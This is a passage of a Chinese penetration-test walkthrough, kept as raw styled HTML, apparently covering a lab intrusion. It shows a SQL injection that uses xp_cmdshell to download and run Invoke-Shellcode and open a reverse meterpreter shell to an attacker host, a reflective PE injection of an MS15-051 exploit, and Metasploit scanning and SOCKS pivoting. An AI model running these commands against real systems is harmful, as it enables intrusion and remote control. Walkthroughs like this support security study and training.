background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">;</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Invoke</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">ReflectivePEInjection</span>&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">PEUrl</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">http</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">:</span><span class="crayon-c" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: italic !important; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(153, 153, 153) !important;">//10.101.101.13/x86/ms15-051.exe&nbsp;-ExeArgs&nbsp;"cmd"&nbsp;-ForceA</span></div></div></td></tr></tbody></table></div></div><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p><span style="letter-spacing: 1px;"></span></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><br/>可以看到提权没有成功，并且换一个&nbsp;Exploit&nbsp;也没成功：</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7ezcr8dkj20kh0dkn67.jpg" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">继续使用&nbsp;msf&nbsp;探测，开启&nbsp;msf&nbsp;监听功能：</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7f062ybij20jx0dg0zm.jpg" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">执行，从数据库主机上反弹一个&nbsp;meterpreter&nbsp;连接：</p><div id="crayon-5c25a60d4f7a6942237604" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-mac print-yes notranslate" style="box-sizing: border-box; margin: 12px 0px; padding: 0px; border: 1px solid rgb(222, 222, 222) !important; font-weight: 500; font-style: normal; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace; vertical-align: baseline; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(248, 248, 255) !important; text-align: left; text-size-adjust: none; overflow: hidden !important; position: relative !important; direction: ltr !important; width: 620px; line-height: 15px !important; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; height: auto;"><div class="crayon-toolbar" style="box-sizing: border-box; margin: 0px; padding: 0px; border-top: 0px; border-right: 0px; border-bottom: 1px solid rgb(222, 222, 222) !important; border-left: 0px; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left; width: 618px; position: relative; overflow: hidden; z-index: 4; height: 18px !important; line-height: 18px !important;"><div class="crayon-tools" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 12px !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: 18px !important; line-height: 18px !important; position: absolute; right: 0px;"><div class="crayon-button crayon-nums-button crayon-pressed" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: -24px 0px no-repeat; text-align: left; height: inherit; line-height: 15px; display: inline; position: relative; width: 24px; text-decoration: none; float: left !important;"><br/></div><span class="crayon-language" style="box-sizing: border-box; margin: 0px; padding: 0px 8px 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;">Default</span></div></div><div class="crayon-plain-wrap" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; height: auto !important;"></div><div class="crayon-main" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; width: 618px; overflow: hidden; position: relative; z-index: 1;"><table class="crayon-table" style="box-sizing: border-box; margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 0px; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; border-collapse: collapse !important; border-spacing: 0px !important; width: auto !important; table-layout: auto !important;"><tbody style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: transparent;"><tr class="crayon-row" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center;"><td class="crayon-nums " style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left;"><div class="crayon-nums-content" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; white-space: nowrap; line-height: 15px !important;"><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">1</div><div class="crayon-num crayon-striped-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">2</div><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">3</div></div></td><td class="crayon-code" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center; text-align: left; width: 1169.6px;"><div class="crayon-pre" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; text-align: left; color: rgb(0, 0, 0); white-space: pre; overflow: visible; tab-size: 4; line-height: 15px !important;"><div class="crayon-line" id="crayon-5c25a60d4f7a6942237604-1" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">http</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">:</span><span class="crayon-c" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: italic !important; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(153, 153, 153) !important;">//10.101.101.13/?page=1;exec&nbsp;master..xp_cmdshell(&#39;IEX(New-Object&nbsp;Net.WebClient).DownloadString("http://10.101.101.16/CodeExecution/Invoke-Shellcode.ps1";)</span></div><div class="crayon-line crayon-striped-line" id="crayon-5c25a60d4f7a6942237604-2" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line" id="crayon-5c25a60d4f7a6942237604-3" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;&nbsp;&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Invoke</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">Shellcode</span>&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">payload</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">windows</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">/</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">meterpreter</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">/</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">reverse</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">_</span>https&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">lhost</span>&nbsp;<span class="crayon-cn" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 153, 153) !important;">10.101.101.16</span>&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">lport</span>&nbsp;<span class="crayon-cn" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 153, 153) !important;">4444</span>&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">force</span>&#39;<span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span></div></div></td></tr></tbody></table></div></div><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">随后用&nbsp;<code style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;">use&nbsp;auxiliary/scanner/smb/smb_version</code>扫描&nbsp;smb&nbsp;获取内网信息，发现&nbsp;mail&nbsp;服务器，然后用&nbsp;<code style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;">use&nbsp;auxiliary/scanner/portscan</code>扫描端口，发现开放&nbsp;80&nbsp;25&nbsp;110&nbsp;端口：</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7f291ny0j20ji09eguf.jpg" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">使用&nbsp;<code style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: baseline; background: transparent;">use&nbsp;auxiliary/server/socks4a</code>&nbsp;代理进内网后在&nbsp;82&nbsp;断口处发现了惊喜：</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><br/><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7f44ai42j21470lyduw.jpg" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; 